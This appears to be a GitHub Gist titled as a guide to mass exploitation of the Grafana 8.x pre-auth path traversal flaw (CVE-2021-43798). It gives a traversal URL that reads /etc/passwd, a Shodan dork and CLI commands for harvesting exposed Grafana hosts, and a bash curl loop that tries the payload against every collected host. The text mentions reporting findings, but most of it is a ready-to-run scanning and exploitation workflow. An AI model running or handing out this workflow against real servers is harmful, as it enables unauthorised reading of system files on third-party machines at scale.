Created
January 6, 2022 14:33
-
-
Save simrotion13/3d3bb493ecb7b0d0fb3b8d97962bf585 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798). | |
| Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files. | |
| Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. | |
| Vulnerable URL : | |
| http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd | |
| Shodan Dork : http.title:"grafana" | |
| To download the results we will use below command ( Note: Shodan Premium API Key is needed to download the results) | |
| #shodan download grafana 'http.title:"grafana"' | |
| We will seperate the IP:PORT from shodan results using shodan parse command along with awk | |
| #shodan parse grafana.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a grafana-ip.txt | |
| I already downloaded the results using shodan cli command | |
| #cat grafana-ip.txt | httpx | tee -a urls.txt | |
| We will using below process to automate the findings | |
| #cat urls.txt | while read host do; do curl -sk --insecure "$host/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" | grep "root:x" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done | |
| This way we can check each vulnerable url and report to respective organization. | |
| Check the Vulnerable URL |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment